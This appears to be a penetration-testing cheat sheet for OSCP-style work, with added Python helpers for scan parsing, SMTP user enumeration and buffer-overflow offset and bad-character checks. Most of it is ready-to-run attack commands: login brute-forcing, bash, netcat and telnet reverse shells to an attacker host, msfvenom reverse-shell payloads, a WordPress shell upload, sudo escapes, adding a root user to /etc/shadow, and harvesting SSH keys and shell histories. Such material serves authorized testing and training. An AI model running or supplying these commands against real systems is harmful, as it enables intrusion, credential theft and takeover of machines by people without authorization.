Here are some useful one-liners and links for pentesters. I have collected these commands so they can be used right away, without spending time on remembering the syntax of a particular tool.

These time savers come in handy in a time-limited pentest or during your OSCP exam.

Disclaimer. On this web site you might read about or get access to various kinds of software and technology, including but not limited to libraries, operating systems, software for communications, mobile phones and tablets, Android software and Linux, even cars and motorcycles, security and penetration testing software, software used in security research and forensics, and some samples of software which can be used (elsewhere) for malicious or illegal purposes. You will read about or be provided with ways to change it, to operate it and to use it. You might find advice and recommendations, which are only an opinion, and not legal advice or a commercial recommendation.
Bear in mind, please, that everything you do, you do solely at your own risk and responsibility. In no way can the author of this web site, or of the information, graphics and other materials presented here or related to it, be made liable or otherwise responsible for your own actions or the actions of any third party, or their direct or indirect results or consequences, with or without the use of this information or of the software, technology and systems mentioned and/or presented here, no matter whether developed by the author or by any third party.
In no way is it guaranteed that you will find any suitability for any particular purpose, safety, security, legality or even simple functioning of the software and systems described here. You have to make sure each time yourself that what you do is really what you intend to do, and that you are ready to take responsibility for it yourself. All the recommendations and experiences described here are the opinions of the corresponding authors and are to be taken with care and at your own full responsibility.
The software provided on or through this web site, linked to from this web site or otherwise related to this web site is provided by the corresponding authors on their own terms. We provide all the software here as is, without any guarantees to you. You are responsible for deciding whether it is suitable for you or not. You are also responsible for all direct or indirect consequences of using this software.
Other web sites linked to from the current one are outside the author's control; we cannot guarantee anything about their content, its quality or even its legality. We cannot be liable for any use of the linked web sites or of the information presented there.
We reasonably try to keep this website running smoothly and to deliver information to the best of our knowledge, corresponding to the state of the art at the time when the information is composed (usually stated together with the information), and with good intent. We cannot, however, guarantee and cannot be liable for this website being temporarily or permanently unavailable, presenting unreliable information or software, or any other similar malfunction or functioning not up to your expectations, or any consequences which might result from this site's operation.

Do not run these commands unless you understand exactly what you are doing!

It is illegal to access machines this way unless you are legally authorized to pentest them!

I assume Kali Linux and Bash below. I also assume that the target is on the network. Please double-check the address you target before running commands from here!

These commands might be and often are dangerous! You alone are responsible for any direct or indirect consequences of using them! Please do not use them unless you fully understand the consequences and are ready to deal with them, also legally. If you disagree, please leave this site immediately.



Crawls Google and Bing to find emails, subdomains and links: web-hunter.


HTTP form bruteforcing

# ^USER^ and ^PASS^ are substituted from -l/-L and -p/-P. The text after the last ':' is a string that
# appears on a FAILED login; hydra reports a hit when it is absent, so pick it carefully.
# The target host goes in front of the module name ($tgt holds the target, as elsewhere on this page).
hydra -l root -P rockyou.txt -t 10 -v $tgt http-form-post "/login.php:login=^USER^&password=^PASS^&par=val:Wrong password"
hydra -L users.txt -P /usr/share/wordlists/rockyou.txt -t 5 -vvv $tgt http-form-post "/index/login.asp:password=^PASS^&username=^USER^&submit=Enter:Username"


Power-tool when other tools do not fit the purpose: Patator.

Network enumeration

Ping sweep in shell

# one ping per host, all in parallel; -n skips reverse DNS, -W 1 waits at most one second per host; adjust the range to the network
for i in $(seq 1 254); do (ping -n -c 1 -W 1 192.168.2.$i | grep "from" | cut -f4 -d" " | tr -d ":") & done; wait

Ping sweep nmap (-sn: host discovery only, no port scan)

nmap -sn $tgt
nmap -sn -oG ping.sweep.res.txt $tgt # grep-friendly output

Port scan nmap

nmap -p 80 -iL host.list.txt -oG web.servers.list.txt # -iL takes the hosts from the list
# Scanning all 65535 ports (-p-) quickly (-T5); fast but noisy, and on a lossy link -T5 may miss ports:
nmap -p- -T5 $tgt
# Scanning quickly only the most commonly used ports, 25 in this case:
nmap -T5 --top-ports=25 $tgt
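The -oG files above are meant to be post-processed. As an added example that is not part of the original page, here is a small Python parser for nmap's grepable format: it merges the Host: lines that belong to the same IP (a -sn sweep writes a Status line, a port scan adds a Ports line), keeps only open ports and produces the host list for a later -iL run. The embedded SAMPLE_OG text is constructed to look like a sweep plus one port scan; it is not a real capture.

```python
import re
from dataclasses import dataclass, field

# Constructed sample of nmap -oG output, not a real capture. Fields are TAB separated;
# each port entry is "port/state/proto/owner/service/rpcinfo/version/".
SAMPLE_OG = (
    "# Nmap 7.70 scan initiated as: nmap -sn -oG ping.sweep.res.txt 192.168.2.0/28\n"
    "Host: 192.168.2.1 ()\tStatus: Up\n"
    "Host: 192.168.2.5 (gw.lan)\tStatus: Up\n"
    "Host: 192.168.2.9 ()\tStatus: Up\n"
    "Host: 192.168.2.9 ()\tPorts: 22/open/tcp//ssh//OpenSSH 7.6p1/, "
    "80/open/tcp//http//Apache httpd 2.4.29/, 443/closed/tcp//https///"
    "\tIgnored State: filtered (997)\n"
    "# Nmap done -- 4 IP addresses (3 hosts up) scanned\n"
)


@dataclass
class HostResult:
    ip: str
    hostname: str = ""
    status: str = ""
    open_ports: list = field(default_factory=list)  # (port, proto, service, version)


def parse_grepable(text):
    """Merge all 'Host:' lines of an -oG file into one HostResult per IP."""
    results = {}
    for line in text.splitlines():
        if not line.startswith("Host: "):
            continue  # comment header and 'Nmap done' footer
        fields = line.split("\t")
        m = re.match(r"Host: (\S+) \((.*?)\)", fields[0])
        if not m:
            continue
        ip, name = m.groups()
        host = results.setdefault(ip, HostResult(ip))
        if name:
            host.hostname = name
        for fld in fields[1:]:
            key, _, value = fld.partition(": ")
            if key == "Status":
                host.status = value
            elif key == "Ports":
                for entry in value.split(", "):
                    parts = entry.split("/")
                    if entry.endswith("/"):
                        parts = parts[:-1]  # every entry carries a trailing slash
                    if len(parts) < 7:
                        continue
                    port, state, proto, _owner, service = parts[:5]
                    version = "/".join(parts[6:])  # version text may itself contain '/'
                    if state == "open":
                        host.open_ports.append((int(port), proto, service, version))
    return results


def _ipv4_key(ip):
    return tuple(int(x) for x in ip.split("."))  # numeric sort, IPv4 only


def live_hosts(results):
    """IPs to feed back into nmap -iL: status Up, or any open port seen."""
    return sorted((ip for ip, h in results.items() if h.status == "Up" or h.open_ports), key=_ipv4_key)


def hosts_with_port(results, port, proto="tcp"):
    """IPs where the given port is open, e.g. the web servers for the next scan."""
    return sorted((ip for ip, h in results.items()
                   if any(p == port and pr == proto for p, pr, _, _ in h.open_ports)), key=_ipv4_key)


if __name__ == "__main__":
    res = parse_grepable(SAMPLE_OG)
    print("\n".join(live_hosts(res)))          # redirect this into host.list.txt
    print("web servers:", hosts_with_port(res, 80))
```

Run it on a real file with parse_grepable(open("ping.sweep.res.txt").read()); the same parser handles the output of a port scan, since only the Ports field changes.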


netdiscover asks the network via ARP and identifies hosts quickly. If no range (-r) is given, it scans a set of common private ranges, which takes long.

Make sure you use the -i interface switch on a multi-NIC Kali.

netdiscover -i eth1 -r
# Passive mode (-p) only sniffs ARP traffic and sends nothing, which avoids detection, but it only sees hosts that talk
netdiscover -p -i eth1 -r


Another way to detect hosts passively is to read the ARP table the kernel has already built (ip neigh show, or the older arp -a).
arp-scan is an advanced ARP tool with many capabilities. One of the easy ways to scan the local network with it:
arp-scan --interface eth1 --localnet


sudo tcpdump -i wlan0 -s0 port 110 -w capture.pcap # -s0 = capture whole packets; POP3 here; any file name will do
tcpdump -nXAvvv -r capture.pcap # read the capture back: -n no name resolution, -X hex and ASCII dump, -A ASCII only

Web Server Enumeration


dirb http://$tgt

HTTP enum nmap

nmap -vvv --script http-enum.nse --script-args http-enum.basepath='/' $tgt

Nikto web server scanner

nikto -host $tgt

Services Enumeration

OS and software version detection with nmap

nmap -iL active.web.servers.txt -sV -O # -sV probes service versions, -O fingerprints the OS (needs root)

SMTP Enumeration

Python script:
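The Python script linked above is not reproduced here. As an added example (my code, neither the page's nor the linked script's), the following does the classic SMTP user enumeration over VRFY: it reads multi-line replies properly, maps the reply codes to a verdict (250/251 mailbox exists, 252 accepted but not confirmed, 550/551/553 unknown user, 500/502 VRFY disabled) and runs the same exchange against a constructed in-memory fake server so it can be tried offline. enumerate_host() is the entry point for a real target; mail.example.test, the user list and the scripted replies are all made up.

```python
import socket


def recv_reply(conn):
    """Read one complete SMTP reply; continuation lines look like '250-...', the last like '250 ...'."""
    data = b""
    while True:
        chunk = conn.recv(4096)
        if not chunk:
            break
        data += chunk
        lines = [ln for ln in data.split(b"\r\n") if ln]
        if data.endswith(b"\r\n") and lines and lines[-1][3:4] == b" ":
            break
    return data


def reply_code(reply):
    """The 3-digit code, or 0 for an empty/garbled reply."""
    try:
        return int(reply[:3])
    except ValueError:
        return 0


def classify(code):
    """What a VRFY reply code tells us about the mailbox."""
    if code in (250, 251):
        return "exists"
    if code == 252:
        return "accepted"      # server will not confirm; compare with a surely bogus user
    if code in (550, 551, 553):
        return "unknown"
    if code in (500, 502):
        return "disabled"      # VRFY switched off; fall back to RCPT TO or EXPN
    return "other"


def vrfy_users(conn, users, helo=b"enum.local"):
    """Drive banner / HELO / VRFY... / QUIT over any object offering sendall() and recv()."""
    recv_reply(conn)                                  # 220 banner
    conn.sendall(b"HELO " + helo + b"\r\n")
    recv_reply(conn)
    results = {}
    for user in users:
        conn.sendall(b"VRFY " + user.encode() + b"\r\n")
        reply = recv_reply(conn)
        results[user] = (reply_code(reply), reply.strip().decode(errors="replace"))
    conn.sendall(b"QUIT\r\n")
    return results


def enumerate_host(host, users, port=25, timeout=5):
    """Entry point for a live target: returns {user: (code, reply text)}."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        return vrfy_users(s, users)


class FakeSMTP:
    """Constructed stand-in for a socket: a Sendmail-style server that knows 'root' and 'www-data'.
    It exists only so this block runs offline; real servers differ (Postfix answers 252 for everyone it accepts)."""
    KNOWN = {"root", "www-data"}

    def __init__(self):
        self.outbox = [b"220 mail.example.test ESMTP ready\r\n"]

    def sendall(self, data):
        cmd, _, arg = data.strip().partition(b" ")
        if cmd == b"HELO":
            self.outbox.append(b"250 mail.example.test Hello enum.local\r\n")
        elif cmd == b"VRFY":
            if arg.decode() in self.KNOWN:
                self.outbox.append(b"250 2.1.5 " + arg + b" <" + arg + b"@mail.example.test>\r\n")
            else:
                self.outbox.append(b"550 5.1.1 " + arg + b"... User unknown\r\n")
        elif cmd == b"QUIT":
            self.outbox.append(b"221 2.0.0 Bye\r\n")

    def recv(self, _n):
        return self.outbox.pop(0) if self.outbox else b""


def demo(users=("root", "www-data", "bob")):
    """Run the exchange against FakeSMTP and return {user: verdict}."""
    results = vrfy_users(FakeSMTP(), list(users))
    return {u: classify(code) for u, (code, _) in results.items()}


if __name__ == "__main__":
    for user, verdict in demo().items():
        print(f"{user:10s} {verdict}")
```

Against a real host, always include a user that certainly does not exist: if it gets the same code as the candidates, the server is not confirming anything and the result means nothing.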

SNMP Enumeration

onesixtyone -c communities.txt -i ips.txt # brute-force community strings against the listed IP addresses
snmpcheck -t $tgt # -t target host, see man
# walk a MIB subtree with the community string found; see the other communities in the file linked above.
# The two usual subtrees are the Windows user list (OID 1.3.6.1.4.1.77.1.2.25) and the installed software (OID 1.3.6.1.2.1.25.6.3.1.2):
snmpwalk -c public -v1 $tgt 1.3.6.1.4.1.77.1.2.25 # users
snmpwalk -c public -v1 $tgt 1.3.6.1.2.1.25.6.3.1.2 # software

SMB Enumeration

Using smbclient to list (-L) the shares without a password (-N):
smbclient -N -L //$tgt
nbtscan, enum4linux and nmap to scan SMB are below:

nbtscan $tgt # NetBIOS host names and other SMB info
enum4linux -a $tgt # enumerates users, machines, names, shares, policies
nmap -p139,445 --script smb-enum-users -iL smb.servers.list.txt # get users
nmap -p139,445 --script smb-check-vulns --script-args=unsafe=1 -v -iL smb.servers.list.txt # finding vulnerabilities; unsafe=1 may crash the service

On a newer nmap smb-check-vulns is gone; the smb-vuln-* scripts replace it and need no additional arguments:
nmap -p139,445 --script "smb-vuln-*" -iL smb.servers.list.txt

Shares and OS discovery over SMB

nmap -v --script smb-enum-shares.nse -p445 -iL smb.servers.list.txt # smb shares
nmap -v -p139,445 --script smb-os-discovery.nse -iL smb.servers.list.txt # smb os discovery

DNS Enumeration

DNS Server Version

nmap -sSU -p 53 --script dns-nsid $tgt

Zone Transfers

host -t ns $d # gives the name servers (dns-server below) of the domain $d
host -t axfr $d dns-server # asks dns-server for a zone transfer of $d
dig axfr $d @dns-server
dnsrecon -t axfr -d $d
# try every name server of the domain given as first argument
d=$1; for ns in $(host -t NS $d | cut -f4 -d" "); do host -l $d $ns | grep "has addr"; done


wpscan -u http://$tgt # current wpscan versions take --url instead of -u
wpscan --enumerate users -u http://$tgt

# Upload shell with metasploit:
# run 'msfconsole' first then
  use exploit/unix/webapp/wp_admin_shell_upload
  set rhost
  set targeturi wordpress
  set username admin
  set password admin

Yertle tool

git clone
# alternative link:
cd WPForce
# test the given logins and passwords against the site
python -i usr.txt -w pass.txt -u ""
# then get a shell; it is limited, so use metasploit or
# this article instead:
python -u "admin" -p "admin" -t ""

Searching exploits

searchsploit the-app-you-discovered


Escalating from docker group to root:

Post-exploitation enumeration

Enumerating a Linux machine

unix-privesc-check standard | grep WARNING

General enumeration

cat /etc/*-release # OS version
uname -a # kernel version and architecture

rpm -q kernel # installed kernel packages (RPM-based distros)

cat ~/.*history # recent commands

find / -perm -o+w -type d 2>/dev/null # world-writable folders
find / -perm -4000 -user root 2>/dev/null # SUID binaries owned by root

grep -E -R '[0-9a-z]{32}' . 2>/dev/null # search by regexp, here a 32-character hex flag

grep "root" * -R | less
grep "pass" * -R | less
tail /etc/passwd # list the last users; these are usually the human accounts
su username # try the other users afterwards; sometimes works when sudo is not there

cat /etc/sudoers # getting sudoers (readable only as root unless misconfigured)
cat /etc/sudoers.d/*

cat ~/.ssh/* # ssh keys
cat /home/*/.ssh/* # ssh keys of others
id # check your groups and their privileges

# add a user "user" with password "123" (needs write access to /etc/shadow). Single quotes are
# required: in double quotes bash would expand $6 and $7 as positional parameters and mangle the hash.
# A matching line is also needed in /etc/passwd, e.g. user:x:0:0::/root:/bin/bash for a uid 0 account.
echo 'user:$6$7heg3R.G$l2H7Sqi1WCWVy.wzyxcyoMi0fL3/q87ssRIwxNovJjFriuc4hbpagcrAegubexgSJA06vvnL41XdeLILDoKBM0:17415:0:99999:7:::' >> /etc/shadow

# lists the commands the current user may run as root
sudo -l

Check the history and logs of administrative tools, e.g. mongo:

cat ~/.dbshell
cat ~/.bash_history
cat ~/.mysql_history
cat ~/.sh_history
# on Windows, PowerShell keeps its history in a file:
(Get-PSReadlineOption).HistorySavePath
type C:\Users\username\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt

Running commands from other commands

# tar: runs the action at every checkpoint; tar refuses to create an empty archive, so give it a file
sudo tar -cf foo.tar /etc/hosts --checkpoint-action=exec=/bin/bash --checkpoint=1

# zip: needs an archive to create; the "unzip" command used for --test is run instead
sudo zip /tmp/x.zip /etc/hosts --test --unzip-command="sh -c /bin/bash"

# vi: shell out from inside the editor
sudo vi
:!/bin/bash

Vulnerability scanning

# Try nmap scripts, maybe even all of them :) "all" includes the intrusive, dos and brute categories,
# so it is very slow and noisy and may crash services; --script vuln or --script "default,safe" is the usual compromise
nmap --script all $tgt

Defect scanning


Sqlmap searches for SQLi defects.

Exploiting and Exploits Engineering


An advanced SQLi exploitation tool: Albatar.


pattern_offset.rb 12345678 # EIP value as seen in the debugger; prints its offset in the pattern
pattern_create.rb 2700 # number of bytes to generate
nasm_shell.rb # generates opcodes, e.g.:
  mov eax, esp  # 89E0
  inc eax       # 40
  jmp esp       # FFE4
  push esp      # 54
  retn          # C3
  call esp      # FFD4
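pattern_create.rb and pattern_offset.rb are small enough to reimplement, which also shows why the offset comes out as it does. As an added example (not from this page and not Metasploit's own code), this Python version generates the same Aa0Aa1... pattern and finds the offset of an EIP value as Immunity shows it: 8 hex digits which, read little-endian, are the 4 pattern characters that landed in the register. The value 39694438 in the usage line is an illustrative value, not a result from any particular target.

```python
import string
import struct

UPPER, LOWER, DIGIT = string.ascii_uppercase, string.ascii_lowercase, string.digits
MAX_UNIQUE = 26 * 26 * 10 * 3   # 20280 bytes; beyond that the pattern would repeat


def pattern_create(length):
    """Same scheme as pattern_create.rb: triples 'Aa0', 'Aa1', ... 'Zz9', cut to length."""
    if length > MAX_UNIQUE:
        raise ValueError(f"a pattern longer than {MAX_UNIQUE} bytes is no longer unique")
    out = []
    for u in UPPER:
        for low in LOWER:
            for d in DIGIT:
                out.append(u + low + d)
                if len(out) * 3 >= length:
                    return "".join(out)[:length]
    return "".join(out)[:length]


def eip_to_chars(eip):
    """A 32-bit register value, as the 4 pattern characters that overwrote it (x86 is little-endian)."""
    return struct.pack("<I", eip).decode("ascii")


def pattern_offset(eip, length=MAX_UNIQUE):
    """Offset of the bytes found in EIP; eip is an int or the 8 hex digits the debugger shows.
    Returns -1 when the value is not part of the pattern (EIP was not overwritten by our buffer)."""
    if isinstance(eip, str):
        eip = int(eip, 16)
    try:
        needle = eip_to_chars(eip)
    except UnicodeDecodeError:      # bytes outside ASCII cannot come from the pattern
        return -1
    return pattern_create(length).find(needle)


if __name__ == "__main__":
    print(pattern_create(2700)[:30])   # send the full 2700 bytes as the overflow buffer
    print(pattern_offset("39694438"))  # prints 2606
```

The offset is where the 4 bytes of the saved return address begin in your buffer, so the next buffer is offset bytes of filler, then the address of a jmp esp, then the shellcode.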

Generating payloads

# list payloads
msfvenom --list payloads

# metasploit payload + options, encoder + options (-b = bad characters to avoid, -i = encoding iterations)
msfvenom -p windows/shell_reverse_tcp LHOST=$attacker_ip LPORT=443 EXITFUNC=thread -f c -e x86/shikata_ga_nai -b "\x00\x0a\x0d" -i 10

# put some NOPs (\x90) in front of the shikata_ga_nai decoder: its GetPC stub writes onto the stack
# right next to ESP and can corrupt the first bytes of the payload when it sits exactly at ESP
# useful switches:
#  output format: -f [c|python|bash|ruby|...], see msfvenom --help-formats
#  executable formats: -f [exe|elf|msi|psh]
#  --smallest generates the smallest possible payload
#  --platform windows | linux
#  -a x86 | x64 # architecture

# an example for SLMail
msfvenom -p windows/shell_reverse_tcp LHOST=$attacker_ip LPORT=443 EXITFUNC=thread -f c -e x86/shikata_ga_nai -b "\x00\x0a\x0d"

Immunity debugger and mona script

!mona modules # list the loaded modules; pick one with Rebase, SafeSEH, ASLR and NXCompat all False
!mona find -s "\xff\xe4" -m abc.dll # find a jmp esp in that module; the address must not contain a bad character
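What !mona bytearray / !mona compare and !mona find -s do can be written down in a few lines, and doing so makes two pitfalls visible: a bad character is either dropped (shifting everything after it) or converted, or it truncates the buffer so that nothing after it can be judged; and the jmp esp address itself is written little-endian into the overflow, so none of its bytes may be a bad character. As an added example that is part of neither the page nor mona, the Python below implements both checks. SENT, the two "memory dumps", FAKE_MODULE and FAKE_BASE (0x5F4A1100) are constructed inputs, not data from a real target.

```python
import struct

JMP_ESP_GADGETS = {            # opcode bytes from the nasm_shell listing above
    b"\xff\xe4": "jmp esp",
    b"\xff\xd4": "call esp",
    b"\x54\xc3": "push esp; ret",
}


def bytearray_without(bad=b"\x00"):
    """All byte values except the ones already known to be bad (like !mona bytearray -b)."""
    return bytes(b for b in range(256) if b not in bad)


def compare_badchars(sent, dumped):
    """Walk the sent array next to what the debugger dumped from memory.
    Returns (bad, unverified): bad = bytes that were dropped or converted,
    unverified = bytes after a truncation point that could not be checked at all."""
    bad, i, j = [], 0, 0
    while i < len(sent):
        if j >= len(dumped):                  # buffer was cut off at this byte
            bad.append(sent[i])
            return bad, list(sent[i + 1:])
        if sent[i] == dumped[j]:
            i += 1
            j += 1
        elif i + 1 < len(sent) and dumped[j] == sent[i + 1]:
            bad.append(sent[i])               # byte was stripped: the dump is shifted by one
            i += 1
        else:
            bad.append(sent[i])               # byte was converted into something else
            i += 1
            j += 1
    return bad, []


def find_gadgets(module_bytes, base):
    """Absolute addresses of jmp-esp equivalents in a module image (like !mona find -s)."""
    hits = []
    for opcodes, name in JMP_ESP_GADGETS.items():
        start = module_bytes.find(opcodes)
        while start != -1:
            hits.append((base + start, name))
            start = module_bytes.find(opcodes, start + 1)
    return sorted(hits)


def addr_is_clean(addr, bad):
    """The return address goes into the buffer little-endian, so none of its 4 bytes may be bad."""
    return not any(b in bad for b in struct.pack("<I", addr))


# Constructed inputs (not from a real target): the array as sent, a dump where 0x0a was
# stripped and 0x0d became 0x00, and a dump truncated at 0x20.
SENT = bytearray_without(b"\x00")
DUMP_MANGLED = SENT.replace(b"\x0a", b"").replace(b"\x0d", b"\x00")
DUMP_TRUNCATED = SENT[:SENT.index(0x20)]
# Constructed module image at a made-up, non-ASLR base: NOPs, jmp esp, padding, push esp/ret, call esp.
FAKE_BASE = 0x5F4A1100
FAKE_MODULE = b"\x90" * 16 + b"\xff\xe4" + b"\x00" * 8 + b"\x54\xc3" + b"\xff\xd4"

if __name__ == "__main__":
    print(compare_badchars(SENT, DUMP_MANGLED))
    for addr, name in find_gadgets(FAKE_MODULE, FAKE_BASE):
        usable = addr_is_clean(addr, b"\x00\x0a\x0d")
        print(hex(addr), name, "usable" if usable else "contains a bad byte")
```

After a truncation, rebuild the array without the byte just found and send it again; repeat until compare_badchars returns no bad bytes and nothing unverified.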


Spawning a shell - makes your remote shell more usable

python -c 'import pty; pty.spawn("/bin/sh")'
perl -e 'exec "/bin/sh";'

Various shells

Reverse shell with bash and redirects

bash -i >& /dev/tcp/$attacker_ip/$attacker_port 0>&1

Generating reverse shell payloads:

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=$attacker_ip LPORT=$attacker_port -f elf > shell

Handling it in metasploit:

use exploit/multi/handler
set payload linux/x86/meterpreter/reverse_tcp
set lhost $attacker_ip
set lport $attacker_port
run

Shell with Ncat with SSL and IP filter

ncat --ssl -nlvp 443 --allow [target ip] # listen on the attacker's machine; --allow accepts connections only from the target
ncat --ssl [attacker ip] 443 -c "cmd.exe" # connect back from the target

Shell with telnet

nc -lvp 4444 # attacker's machine, for input
nc -lvp 4445 # attacker's machine, for output
telnet [attacker ip] 4444 | /bin/sh | telnet [attacker ip] 4445 # on the target system; use the attacker's IP in both places

mknod shell

mknod backpipe p && nc [attacker ip] 443 0<backpipe | /bin/bash 1>backpipe # on the target: the named pipe feeds the shell's output back into nc
nc -nlvp 443 # on the attacker's machine

Serving Payloads

One line servers

python -m SimpleHTTPServer 8080 # python 2; with python 3: python3 -m http.server 8080
python -m pyftpdlib -w -d . -V -p 2121 # FTP server on port 2121; anonymous write (-w) to the current folder is enabled!
python -m CGIHTTPServer # python 2; executes scripts in ./cgi-bin/. Sample script: a simple uploading site, which can be served or simply run

Cross Pasting

# paste text into a file on the target through a heredoc; finish with EOF on a line of its own
cat << EOF > res.txt
> code
> more code
> EOF

ZSSH - file transfers inside an ssh shell

# to download a file from the target (typed in the remote shell)
root@target: sz file.txt
# to upload: press Ctrl-Space to get the local zssh prompt, then
zssh > sz file.txt

SSH tunneling

# general form: -L binds a local port and forwards it through the ssh host; -R binds a port on the ssh host and forwards it back to us
ssh -L [local port]:[remote ip]:[remote port] [user]@[ssh host]
ssh -R [remote port]:[local ip]:[local port] [user]@[ssh host]
ssh -L 8080: root@ # local port 8080 goes to the given ip:port through the ssh host

Opening port 80 of a host reachable from here as port 8080 on the remote server:

ssh -R 8080: root@ # remote port

SSH dynamic forwarding

ssh -D [port] -N [username]@[ip] # -D opens a SOCKS proxy on the local port, -N runs no remote command
proxychains ifconfig # run tools through it after pointing /etc/proxychains.conf at that SOCKS port

SSH Audit host

Password cracking

A large list of password recovery tools:
Calling john from metasploit for NTLM cracks:

CEWL - building word lists

cewl -d 0 -m 5 -w mylist.txt
# this makes a list of words of at least 5 characters (-m 5) from the given URL and saves it; depth 0 (-d 0) means links are not followed
# remove the wikipedia words and the languages listed: only lines present in mylist.txt alone survive
diff --new-line-format="" --unchanged-line-format="" <(sort mylist.txt) <(sort wikipedia.langs.lst) | grep -iv "wiki" | uniq
List of languages on Wikipedia: wikipedia.langs.lst

John - mutate the word list

john -wordlist:words.txt -rules:Wordlist -stdout >> passwords.txt
See the Wordlist rules list in /etc/john/john.conf from [List.Rules:Wordlist] line


This website will crack some kinds of hashes for you online.


 * Much larger arsenal:  my fork:
 * Pentest wiki: my fork:
 * Hacking tutorials:
 * Linux enumeration by g0tm1lk:

Last update: 04/03/2019